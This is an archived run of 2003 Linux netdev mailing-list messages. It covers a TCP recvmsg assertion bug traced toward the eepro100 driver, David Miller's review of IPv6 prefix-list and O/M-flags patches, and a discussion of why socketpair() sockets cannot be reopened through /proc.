From cedric.gavage@unixtech.be Wed Jul 23 02:45:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:45:41 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9jUFl026818 for ; Wed, 23 Jul 2003 02:45:31 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6N9jSZk016540; Wed, 23 Jul 2003 11:45:28 +0200 Message-ID: <3F1E58EE.5010109@unixtech.be> Date: Wed, 23 Jul 2003 11:44:14 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> In-Reply-To: <20030723023528.76b0f69c.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4237 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 11:23:03 +0200 > Cedric Gavage wrote: > > >>Still this with 2.4.21 kernel: (intel internet card, driver eepro100) >> >>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE >>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) > > > What interesting programs are you running on this system? > > Are you running and old version of vsftpd? > Thanks for your help... This server is efnet.skynet.be, ircd server connected on EFnet with ircd-hybrid-6.4... 
System is a Debian stable 3.0 aka woody (standard).

Here is the "cat /proc/version" output

Linux version 2.4.21-dell.poweredge.ppro.nosmp (root@localhost) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Sat Jul 19 16:13:28 CEST 2003

Here is the "cat /proc/cpu" output:

fazer:/root# cat /proc/cpuinfo
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 8
model name      : Pentium III (Coppermine)
stepping        : 6
cpu MHz         : 993.399
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
bogomips        : 1979.18

Here is the "cat /proc/meminfo" output:

fazer:/root# cat /proc/meminfo
        total:    used:    free:  shared: buffers:  cached:
Mem:  262762496 214491136 48271360        0  6619136 83787776
Swap: 995250176  1622016 993628160
MemTotal:       256604 kB
MemFree:         47140 kB
MemShared:           0 kB
Buffers:          6464 kB
Cached:          80888 kB
SwapCached:        936 kB
Active:          61152 kB
Inactive:       122056 kB
HighTotal:           0 kB
HighFree:            0 kB
LowTotal:       256604 kB
LowFree:         47140 kB
SwapTotal:      971924 kB
SwapFree:       970340 kB

Here is the "cat /proc/modules" output.

fazer:/root# cat /proc/modules
serial                 44160   0 (autoclean)
eepro100               18060   2
mii                     2480   0 [eepro100]

Here is the running process list.

fazer:/root# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   1272   436 ?        S    Jul22   0:06 init [2]
root         2  0.0  0.0      0     0 ?        SW   Jul22   0:00 [keventd]
root         3  0.0  0.0      0     0 ?        SWN  Jul22   0:00 [ksoftirqd_CPU0]
root         4  0.0  0.0      0     0 ?        SW   Jul22   0:00 [kswapd]
root         5  0.0  0.0      0     0 ?        SW   Jul22   0:00 [bdflush]
root         6  0.0  0.0      0     0 ?        SW   Jul22   0:00 [kupdated]
root         7  0.0  0.0      0     0 ?        SW   Jul22   0:00 [scsi_eh_0]
root         8  0.0  0.0      0     0 ?        SW   Jul22   0:00 [scsi_eh_1]
root       164  0.0  0.2   1340   556 ?        S    Jul22   1:39 /sbin/syslogd
root       167  0.0  0.4   2012  1188 ?        S    Jul22   0:00 /sbin/klogd
root       170  0.1  1.5   5340  4088 ?        S    Jul22   2:43 /usr/sbin/named
root       187  0.0  0.1   1248   420 ?        S    Jul22   0:00 /usr/sbin/inetd
root       190  0.0  0.3   5692   788 ?        S    Jul22   0:00 /usr/sbin/ippl
root       192  0.0  0.3   5692   788 ?        S    Jul22   0:00 /usr/sbin/ippl
nobody     193  0.0  0.3   5692   788 ?        S    Jul22   0:01 /usr/sbin/ippl
nobody     194  1.3  0.3   5692   788 ?        R    Jul22  22:43 /usr/sbin/ippl
ircd       197  0.6 33.8 111524 86980 ?        S    Jul22  10:53 /usr/local/ircd-hybrid/ircd
smmsp      224  0.0  0.6   4988  1668 ?        S    Jul22   0:00 sendmail: MSP: Queue runner@00:10:0
root       228  0.0  0.8   3140  2100 ?        S    Jul22   0:15 /usr/sbin/snmpd -s -l /dev/null
root       230  0.0  0.3   2016   860 ?        S    Jul22   0:00 /usr/sbin/snmptrapd -s
root       236  0.0  0.3   2784  1016 ?        S    Jul22   0:00 /usr/sbin/sshd
root       239  0.0  0.7   1976  1968 ?        SL   Jul22   0:00 /usr/sbin/ntpd
daemon     242  0.0  0.2   1384   556 ?        S    Jul22   0:00 /usr/sbin/atd
root       245  0.0  0.2   1652   680 ?        S    Jul22   0:00 /usr/sbin/cron
root       248  0.0  0.1   1256   412 tty1     S    Jul22   0:00 /sbin/getty 38400 tty1
root       249  0.0  0.1   1256   412 tty2     S    Jul22   0:00 /sbin/getty 38400 tty2
root       250  0.0  0.1   1256   412 tty3     S    Jul22   0:00 /sbin/getty 38400 tty3
root       251  0.0  0.1   1256   412 tty4     S    Jul22   0:00 /sbin/getty 38400 tty4
root       252  0.0  0.1   1256   412 tty5     S    Jul22   0:00 /sbin/getty 38400 tty5
root       253  0.0  0.1   1256   412 tty6     S    Jul22   0:00 /sbin/getty 38400 tty6
root       254  0.0  1.3   8292  3356 ?        S    Jul22   0:00 /opt/tivoli/tsm/client/ba/bin/dsmc
root       255  0.0  1.3   8292  3356 ?        S    Jul22   0:00 /opt/tivoli/tsm/client/ba/bin/dsmc
root       256  0.0  1.3   8292  3356 ?        S    Jul22   0:00 /opt/tivoli/tsm/client/ba/bin/dsmc
root      3366  0.0  0.6   5732  1708 ?        S    11:37   0:00 /usr/sbin/sshd
root      3368  0.0  0.5   2464  1332 pts/0    S    11:37   0:00 -bash
root      3394  7.0  0.6   5732  1708 ?        R    11:42   0:00 /usr/sbin/sshd
root      3396  0.0  0.5   2456  1312 pts/1    S    11:42   0:00 -bash
root      3413  0.0  0.6   3544  1568 pts/1    R    11:42   0:00 ps aux

-- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From davem@redhat.com Wed Jul 23 02:49:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 02:49:20 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6N9nGFl027325 for ; Wed, 23 Jul 2003 02:49:16 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id CAA09215; Wed, 23 Jul 2003 02:46:48 -0700 Date: Wed, 23 Jul 2003 02:46:48 -0700 From: "David S. Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030723024648.2e4b6a62.davem@redhat.com> In-Reply-To: <3F1E58EE.5010109@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4238 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 11:44:14 +0200 Cedric Gavage wrote: > David S. Miller wrote: > > On Wed, 23 Jul 2003 11:23:03 +0200 > > Cedric Gavage wrote: > >>Still this with 2.4.21 kernel: (intel internet card, driver eepro100) > >> > >>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE > >>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563) > > Are you running and old version of vsftpd? > > Thanks for your help...
> > This server is efnet.skynet.be, ircd server connected on EFnet with > ircd-hybrid-6.4... Any chance you can try with the e100 driver instead of eepro100? From davem@redhat.com Wed Jul 23 03:05:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 03:06:08 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NA5nFl030882 for ; Wed, 23 Jul 2003 03:05:57 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id DAA09251; Wed, 23 Jul 2003 03:02:56 -0700 Date: Wed, 23 Jul 2003 03:02:56 -0700 From: "David S. Miller" To: Krishna Kumar Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: [PATCH] Prefix List against 2.4.21 Message-Id: <20030723030256.42e687b1.davem@redhat.com> In-Reply-To: References: <200307210155.FAA31320@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4239 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 22 Jul 2003 16:52:24 -0700 (PDT) Krishna Kumar wrote: > The same patch against 2.4.21. I've applied both 2.5.x and 2.4.x patches. Thanks. On the 2.4.x side, Marcelo is only accepting bug fixes so this prefix list stuff will have to wait for 2.4.23-pre1 before going in. 
From davem@redhat.com Wed Jul 23 03:16:50 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 03:16:59 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NAGkFl032317
    for ; Wed, 23 Jul 2003 03:16:49 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1])
    by pizda.ninka.net (8.9.3/8.9.3) with SMTP id DAA09282;
    Wed, 23 Jul 2003 03:13:51 -0700
Date: Wed, 23 Jul 2003 03:13:51 -0700
From: "David S. Miller"
To: Krishna Kumar
Cc: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com, linux-net@vger.kernel.org, krkumar@us.ibm.com
Subject: Re: O/M flags against 2.6.0-test1
Message-Id: <20030723031351.4e9db07c.davem@redhat.com>
In-Reply-To:
References: <200307210155.FAA31320@dub.inr.ac.ru>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4240
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Tue, 22 Jul 2003 14:50:21 -0700 (PDT)
Krishna Kumar wrote:

> I am using sizeof(struct xxx) or __u32, etc in the code, I guess you are
> ok with that.

This needs some fixes still.

First thing, ipv6_devconf is not obtainable from user and has pointers
in it which makes usage sloppy. So I would suggest the following:

1) Remove "void *sysctl;" from ipv6_devconf, move it into inet6_dev
   ie. "void *cnf_sysctl;" update all code users.

2) Move "struct ipv6_devconf" into some linux/*.h ipv6 header
   usable by users. Use an existing one if possible. Then
   make sure net/if_inet6.h includes this thing.

3) Change "int" members of struct "ipv6_devconf" to "s32".
   It's anal and unnecessary on any current platform, but
   some day with 128-bit computers it might make some difference.
   :-)

Thanks.
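
The three suggestions above can be sketched in user-space C. This is only an illustration under stated assumptions, not the kernel's actual layout: the struct names `devconf_sketch` and `inet6_dev_sketch` and the helper `export_devconf` are hypothetical, the four members are an illustrative subset, and `int32_t` stands in for the kernel's `s32`.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical user-visible config: fixed-width members only, no pointers,
 * so the layout is the same for every consumer of the header. */
struct devconf_sketch {
    int32_t forwarding;
    int32_t hop_limit;
    int32_t mtu6;
    int32_t accept_ra;
};

/* Hypothetical kernel-private container: the sysctl pointer lives here
 * rather than inside the exported structure. */
struct inet6_dev_sketch {
    struct devconf_sketch cnf;  /* safe to copy out as-is */
    void *cnf_sysctl;           /* never exported */
};

/* Copy the exportable part into a caller buffer.
 * Returns the number of bytes written, or 0 if the buffer is too small. */
static size_t export_devconf(const struct inet6_dev_sketch *idev,
                             void *buf, size_t len)
{
    if (len < sizeof(idev->cnf))
        return 0;
    memcpy(buf, &idev->cnf, sizeof(idev->cnf));
    return sizeof(idev->cnf);
}
```

With the pointer kept outside the exported struct, the copy-out is a plain `memcpy` of a structure whose size does not depend on pointer or `int` width.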
From cedric.gavage@unixtech.be Wed Jul 23 04:31:26 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 04:31:38 -0700 (PDT)
Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NBVPFl012376
    for ; Wed, 23 Jul 2003 04:31:26 -0700
Received: from unixtech.be (warp-core.skynet.be [195.238.24.200])
    (authenticated bits=0)
    by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6NBVMZk026197;
    Wed, 23 Jul 2003 13:31:23 +0200
Message-ID: <3F1E71C1.8080302@unixtech.be>
Date: Wed, 23 Jul 2003 13:30:09 +0200
From: Cedric Gavage
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73
X-Accept-Language: en
MIME-Version: 1.0
To: "David S. Miller"
CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com
Subject: Re: [Fwd: kernel 2.4.21]
References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com>
In-Reply-To: <20030723024648.2e4b6a62.davem@redhat.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 4241
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: cedric.gavage@unixtech.be
Precedence: bulk
X-list: netdev

David S. Miller wrote:
> On Wed, 23 Jul 2003 11:44:14 +0200
> Cedric Gavage wrote:
>
>
>>David S. Miller wrote:
>>
>>>On Wed, 23 Jul 2003 11:23:03 +0200
>>>Cedric Gavage wrote:
>>>
>>>>Still this with 2.4.21 kernel: (intel internet card, driver eepro100)
>>>>
>>>>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE
>>>>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563)
>>>
>>>Are you running an old version of vsftpd?
>>
>>Thanks for your help...
>>
>>This server is efnet.skynet.be, ircd server connected on EFnet with
>>ircd-hybrid-6.4...
>
>
> Any chance you can try with the e100 driver instead of eepro100?
>

Could I use it with these cards?

Jul 22 07:55:39 fazer kernel: eepro100.c:v1.09j-t 9/29/99 Donald Becker http://www.scyld.com/network/eepro100.html
Jul 22 07:55:39 fazer kernel: eepro100.c: $Revision: 1.36 $ 2000/11/17 Modified by Andrey V. Savochkin and others
Jul 22 07:55:39 fazer kernel: eth0: Intel Corp. 82557/8/9 [Ethernet Pro 100], 00:B0:D0:B0:D0:FB, IRQ 16.
Jul 22 07:55:39 fazer kernel: Receiver lock-up bug exists -- enabling work-around.
Jul 22 07:55:39 fazer kernel: Board assembly 07195d-000, Physical connectors present: RJ45
Jul 22 07:55:39 fazer kernel: Primary interface chip i82555 PHY #1.
Jul 22 07:55:39 fazer kernel: General self-test: passed.
Jul 22 07:55:39 fazer kernel: Serial sub-system self-test: passed.
Jul 22 07:55:39 fazer kernel: Internal registers self-test: passed.
Jul 22 07:55:39 fazer kernel: ROM checksum self-test: passed (0x04f4518b).
Jul 22 07:55:39 fazer kernel: Receiver lock-up workaround activated.
Jul 22 07:55:39 fazer kernel: eth1: Intel Corp. 82557/8/9 [Ethernet Pro 100] (#2), 00:B0:D0:B0:D0:FC, IRQ 17.
Jul 22 07:55:39 fazer kernel: Receiver lock-up bug exists -- enabling work-around.
Jul 22 07:55:39 fazer kernel: Board assembly 07195d-000, Physical connectors present: RJ45
Jul 22 07:55:39 fazer kernel: Primary interface chip i82555 PHY #1.
Jul 22 07:55:39 fazer kernel: General self-test: passed.
Jul 22 07:55:39 fazer kernel: Serial sub-system self-test: passed.
Jul 22 07:55:39 fazer kernel: Internal registers self-test: passed.
Jul 22 07:55:39 fazer kernel: ROM checksum self-test: passed (0x04f4518b).
Jul 22 07:55:39 fazer kernel: Receiver lock-up workaround activated.

--
Cedric Gavage
http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64

From cedric.gavage@unixtech.be Wed Jul 23 04:41:54 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 04:42:03 -0700 (PDT)
Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NBfrFl013214
    for ; Wed, 23 Jul 2003 04:41:53 -0700
Received: from unixtech.be (warp-core.skynet.be [195.238.24.200])
    (authenticated bits=0)
    by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6NBfpZk027097;
    Wed, 23 Jul 2003 13:41:51 +0200
Message-ID: <3F1E7435.4060308@unixtech.be>
Date: Wed, 23 Jul 2003 13:40:37 +0200
From: Cedric Gavage
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73
X-Accept-Language: en
MIME-Version: 1.0
To: "David S. Miller"
CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com
Subject: Re: [Fwd: kernel 2.4.21]
References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com>
In-Reply-To: <20030723024648.2e4b6a62.davem@redhat.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 4242
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: cedric.gavage@unixtech.be
Precedence: bulk
X-list: netdev

David S. Miller wrote:
> On Wed, 23 Jul 2003 11:44:14 +0200
> Cedric Gavage wrote:
>
>
>>David S. Miller wrote:
>>
>>>On Wed, 23 Jul 2003 11:23:03 +0200
>>>Cedric Gavage wrote:
>>>
>>>>Still this with 2.4.21 kernel: (intel internet card, driver eepro100)
>>>>
>>>>Jul 23 07:25:58 fazer kernel: recvmsg bug: copied 7CB284C0 seq 7CB288AE
>>>>Jul 23 07:25:58 fazer kernel: KERNEL: assertion (flags&MSG_PEEK) failed at tcp.c(1563)
>>>
>>>Are you running an old version of vsftpd?
>>
>>Thanks for your help...
>>
>>This server is efnet.skynet.be, ircd server connected on EFnet with
>>ircd-hybrid-6.4...
>
>
> Any chance you can try with the e100 driver instead of eepro100?
>

OK, the server is now running the e100 driver. I will wait a few hours to
see whether the problem comes back. Thanks for your help.

--
Cedric Gavage
http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64

From davem@redhat.com Wed Jul 23 04:42:45 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 04:42:49 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NBgiFl013490
    for ; Wed, 23 Jul 2003 04:42:45 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1])
    by pizda.ninka.net (8.9.3/8.9.3) with SMTP id EAA09784;
    Wed, 23 Jul 2003 04:40:27 -0700
Date: Wed, 23 Jul 2003 04:40:27 -0700
From: "David S. Miller"
To: Cedric Gavage
Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com
Subject: Re: [Fwd: kernel 2.4.21]
Message-Id: <20030723044027.152a298d.davem@redhat.com>
In-Reply-To: <3F1E71C1.8080302@unixtech.be>
References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E71C1.8080302@unixtech.be>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4243
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Wed, 23 Jul 2003 13:30:09 +0200
Cedric Gavage wrote:

> David S. Miller wrote:
> > Any chance you can try with the e100 driver instead of eepro100?
> Could I use it with these cards?

Yes, if anything, e100 works with more cards than eepro100 does.

e100 is supported well, whereas I can't remember the last time
eepro100 had a change made to it :-)

From davem@redhat.com Wed Jul 23 07:05:13 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 07:05:53 -0700 (PDT)
Received: from rth.ninka.net (rth.ninka.net [216.101.162.244])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NE4VFl023426
    for ; Wed, 23 Jul 2003 07:05:12 -0700
Received: from rth.ninka.net (localhost.localdomain [127.0.0.1])
    by rth.ninka.net (8.12.8/8.12.8) with SMTP id h6NE4VIM018851;
    Wed, 23 Jul 2003 07:04:31 -0700
Date: Wed, 23 Jul 2003 07:04:31 -0700
From: "David S. Miller"
To: David Korn
Cc: linux-kernel@vger.kernel.org, gsf@research.att.com, netdev@oss.sgi.com
Subject: Re: kernel bug in socketpair()
Message-Id: <20030723070431.13859c09.davem@redhat.com>
In-Reply-To: <200307231332.JAA26197@raptor.research.att.com>
References: <200307231332.JAA26197@raptor.research.att.com>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4244
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Wed, 23 Jul 2003 09:32:09 -0400 (EDT)
David Korn wrote:

[ Added netdev@oss.sgi.com, the proper place to discuss networking kernel issues. ]

> The first problem is that files created with socketpair() are not accessible
> via /dev/fd/n or /proc/$$/fd/n where n is the file descriptor returned
> by socketpair(). Note that this is not a problem with pipe().

Not a bug.

Sockets are not openable via /proc files under any circumstances,
not just the circumstances you describe. This is a policy decision and
prevents a whole slew of potential security holes.
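
The behaviour described above can be checked from user space with a small C sketch. The helper names (`reopen_via_proc`, `proc_fd_target`, `is_socket_link`) are hypothetical and introduced only for this illustration; the sketch assumes a Linux system with /proc mounted. The ENXIO result and the "socket:[inode]" link text are the ones reported elsewhere in this thread.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Try to re-open descriptor fd through /proc/self/fd/<fd>.
 * Returns 0 on success, or the errno value set by open() on failure. */
static int reopen_via_proc(int fd)
{
    char path[64];
    snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
    /* O_NONBLOCK so that opening a pipe end can never block. */
    int newfd = open(path, O_RDONLY | O_NONBLOCK);
    if (newfd < 0)
        return errno;
    close(newfd);
    return 0;
}

/* Read the symlink text of /proc/self/fd/<fd> into buf (NUL-terminated).
 * Returns 0 on success, -1 on failure. */
static int proc_fd_target(int fd, char *buf, size_t len)
{
    char path[64];
    snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
    ssize_t n = readlink(path, buf, len - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return 0;
}

/* True if the link text has the "socket:[inode]" form used for sockets. */
static int is_socket_link(const char *target)
{
    return strncmp(target, "socket:[", 8) == 0;
}
```

Calling `reopen_via_proc()` on one end of a `socketpair(AF_UNIX, SOCK_STREAM, 0, sv)` is expected to return ENXIO, while the same call on the read end of a `pipe()` is expected to return 0.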
From dgk@research.att.com Wed Jul 23 07:29:09 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 07:29:42 -0700 (PDT)
Received: from linux.research.att.com (H-135-207-24-16.research.att.com [135.207.24.16])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NESSFl024955
    for ; Wed, 23 Jul 2003 07:29:09 -0700
Received: from raptor.research.att.com (raptor.research.att.com [135.207.23.32])
    by linux.research.att.com (8.12.8/8.12.8) with ESMTP id h6NEjTJh026849;
    Wed, 23 Jul 2003 10:45:29 -0400
Received: (from dgk@localhost)
    by raptor.research.att.com (SGI-8.9.3p2/8.8.7) id KAA15254;
    Wed, 23 Jul 2003 10:28:22 -0400 (EDT)
Date: Wed, 23 Jul 2003 10:28:22 -0400 (EDT)
From: David Korn
Message-Id: <200307231428.KAA15254@raptor.research.att.com>
X-Mailer: mailx (AT&T/BSD) 9.9 2003-01-17
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: davem@redhat.com
Subject: Re: Re: kernel bug in socketpair()
Cc: gsf@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com
X-archive-position: 4245
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: dgk@research.att.com
Precedence: bulk
X-list: netdev

> On Wed, 23 Jul 2003 09:32:09 -0400 (EDT)
> David Korn wrote:
>
> [ Added netdev@oss.sgi.com, the proper place to discuss networking kernel issues. ]
>
> > The first problem is that files created with socketpair() are not accessible
> > via /dev/fd/n or /proc/$$/fd/n where n is the file descriptor returned
> > by socketpair(). Note that this is not a problem with pipe().
>
> Not a bug.
>
> Sockets are not openable via /proc files under any circumstances,
> not just the circumstances you describe. This is a policy decision and
> prevents a whole slew of potential security holes.
>
>

Thanks for your quick response.

This makes sense for INET sockets, but I don't understand the security
considerations for UNIX domain sockets. Could you please elaborate?
Moreover, /dev/fd/n (as opposed to /proc/$$/fd/n) is restricted to
the current process and its descendants if close-on-exec is not specified.
Again, I don't understand why this would create a security problem
either, since the socket is already accessible via the original
descriptor.

Finally, if this is a security problem, why is errno set to ENXIO
rather than EACCES?

David Korn
dgk@research.att.com

From davem@redhat.com Wed Jul 23 07:48:55 2003
Received: with ECARTIS (v1.0.0; list netdev); Wed, 23 Jul 2003 07:49:31 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242])
    by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6NEmWFl026345
    for ; Wed, 23 Jul 2003 07:48:55 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1])
    by pizda.ninka.net (8.9.3/8.9.3) with SMTP id HAA10323;
    Wed, 23 Jul 2003 07:46:15 -0700
Date: Wed, 23 Jul 2003 07:46:15 -0700
From: "David S. Miller"
To: David Korn
Cc: gsf@research.att.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: kernel bug in socketpair()
Message-Id: <20030723074615.25eea776.davem@redhat.com>
In-Reply-To: <200307231428.KAA15254@raptor.research.att.com>
References: <200307231428.KAA15254@raptor.research.att.com>
